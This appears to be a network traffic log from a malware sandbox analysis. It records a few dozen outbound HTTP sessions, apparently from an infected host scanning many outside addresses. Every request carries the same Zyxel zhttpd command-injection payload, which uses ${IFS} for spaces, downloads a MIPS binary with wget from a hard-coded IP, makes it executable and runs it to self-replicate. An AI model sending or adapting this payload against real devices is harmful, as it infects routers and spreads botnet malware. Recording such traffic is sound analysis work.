                                      Jan 19, 2024 17:29:25.642874002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2894192.168.2.1443452115.195.157.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642932892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2895192.168.2.145350288.186.59.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642952919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2896192.168.2.1454836162.18.28.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642982006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2897192.168.2.1444630140.30.121.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643034935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2898192.168.2.145833620.152.178.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643076897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2899192.168.2.1453486174.253.97.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643131971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2900192.168.2.145252281.186.57.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643183947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2901192.168.2.1450060211.127.104.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643229961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2902192.168.2.1456132195.222.175.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643263102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2903192.168.2.1437942118.114.218.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643306971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2904192.168.2.1437066131.250.112.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643332958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2905192.168.2.1454940143.193.197.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643367052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2906192.168.2.1451506147.197.170.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643421888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2907192.168.2.1459902149.24.97.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643455982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2908192.168.2.144062068.156.8.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643507004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2909192.168.2.1442534222.49.166.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643570900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2910192.168.2.144127812.185.141.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643610954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2911192.168.2.1459056188.204.232.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643646002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2912192.168.2.144113450.194.99.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643662930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2913192.168.2.1438358137.136.1.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643711090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2914192.168.2.144842041.195.64.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643759012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2915192.168.2.1460746132.198.151.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643785000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2916192.168.2.1444500181.185.163.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643826962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2917192.168.2.1443666101.166.152.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643853903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2918192.168.2.1444024102.90.166.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643887997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2919192.168.2.1454652131.144.143.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643951893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2920192.168.2.1458816139.30.124.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.643990993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2921192.168.2.14344748.8.208.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.644022942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2922192.168.2.1435824201.45.184.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.644121885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2923192.168.2.146008291.41.251.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.646848917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2924192.168.2.1436964106.194.243.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.646965027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2925192.168.2.14378881.133.51.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.647365093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2926192.168.2.144225414.149.15.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656002998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2927192.168.2.1432782177.4.156.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656023979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2928192.168.2.1436022119.124.102.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656065941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2929192.168.2.1449186162.183.71.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656107903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2930192.168.2.1444718183.0.115.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656142950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2931192.168.2.145199638.166.44.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656167030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2932192.168.2.144564285.161.221.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656224012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2933192.168.2.1440228143.56.190.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656274080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2934192.168.2.144286292.68.17.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656308889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2935192.168.2.1445958202.221.170.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656343937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2936192.168.2.1446852138.98.194.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656388044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2937192.168.2.144824241.225.214.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656420946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2938192.168.2.1441664183.105.109.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656451941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2939192.168.2.1448922196.17.123.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656503916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2940192.168.2.1457450213.188.139.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656546116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2941192.168.2.143424673.16.235.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656588078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2942192.168.2.1436928156.247.97.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656636000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2943192.168.2.1436006141.54.196.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656694889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2944192.168.2.145132647.76.3.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656744003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2945192.168.2.145794281.141.69.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656796932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2946192.168.2.1452442152.9.39.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656825066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2947192.168.2.145724479.74.170.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656867981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2948192.168.2.1458514161.107.44.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656888962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2949192.168.2.14485941.24.195.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656944990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2950192.168.2.1452582107.42.197.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.656965017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2951192.168.2.145804288.50.250.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657047987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2952192.168.2.1459850170.193.167.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657069921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2953192.168.2.1460062130.49.178.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657098055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2954192.168.2.1456110145.82.82.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657151937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2955192.168.2.1440956160.231.129.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657186031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2956192.168.2.145668840.214.140.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657210112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2957192.168.2.1450580110.162.187.156443
                                      TimestampBytes transferredDirectionData
